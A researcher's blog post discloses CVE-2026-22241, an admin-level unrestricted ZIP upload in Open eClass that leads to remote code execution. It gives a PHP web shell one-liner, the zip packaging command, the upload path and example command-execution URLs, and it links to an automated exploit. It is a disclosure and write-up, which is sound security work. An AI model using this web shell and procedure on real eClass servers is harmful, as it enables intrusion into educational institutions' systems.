Skip to main content

CVE-2026-22241 : Open eClass Unrestricted File Upload Leads to Remote Code Execution

·356 words·2 mins·
Ashif Iqubal
Author
Ashif Iqubal
Hello, Fri3nd!

Hello Fri3nd,

Happy New Year 2026! Have a wonderful year ahead. I recently discovered my first CVE in Open eClass (prior to v4.2), a widely used open-source course management system. The flaw is assigned as CVE-2026-22241 with CVSS Score of 7.3 HIGH , that allows an administrative user to achieve Remote Code Execution (RCE) by uploading a malicious ZIP file into the web server.

Open eClass (formerly GUnet eClass) is a platform used by educational institutions to manage courses and digital classrooms.

Vulnerability Overview:
#

  • The Entry Point: An admin can upload a evil.zip archive containing theme data.

  • The Flaw: The application extracts the contents of the ZIP file into a publicly accessible directory /courses/theme_data/ without validating the file types inside the archive.

  • The Exploit: By packing a simple PHP shell into the ZIP file, the server extracts it and RCE is achieved.

Exploitation Steps
#

Version Details
#

Web Server Version: Apache/2.4.58 (Ubuntu)
PHP version : 8.3.6
Database server version : 8.0.40-0ubuntu0.24.04.1
Version : Open eClass 4.0.1

Video Poc Explanation
#

Automated Exploit
#

Ashifcoder/CVE-2026-22241

CVE-2026-22241 Exploit for GUnet Open eClass Unrestricted File Upload Leads to Remote Code Execution (RCE)

Python
1
0

Manual Exploitation Steps
#

Step 1. Login as an Administrator
#

Step 2. Navigate to the “Admin Tool” > “Theme Setting” form Administration Page.
#

Now navigate to “Theme Settings”

Direct Url :

http://172.16.10.134/openeclass/modules/admin/theme_options.php
Import Option

Step 3. Creating the Malicious Zip.
#

Create a malicious file contains evil.php

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Create the archive.

zip poc.zip evil.php 

Step 4. Upload the malicious zip in import option
#

After uploading we will get successful upload message.

Step 5. Execute Remote Commands
#

Now execute arbitrary commands using directly via a web browser

RCE Example executing whoami:

http://172.16.10.134/openeclass/courses/theme_data/evil.php?cmd=whoami

RCE Example executing uname -a:

http://172.16.10.134/openeclass/courses/theme_data/evil.php?cmd=uname%20-a

Acknowledgements
#

  • RoboGR00t for initial research on Open eClass GUnet.
  • FreySolarEye for research on Open eClass GUnet.
  • GUnet for their ongoing commitment to enhancing platform security.

References
#

If you enjoyed this deep dive there’s more content on my YouTube channel Security Journey With Ashif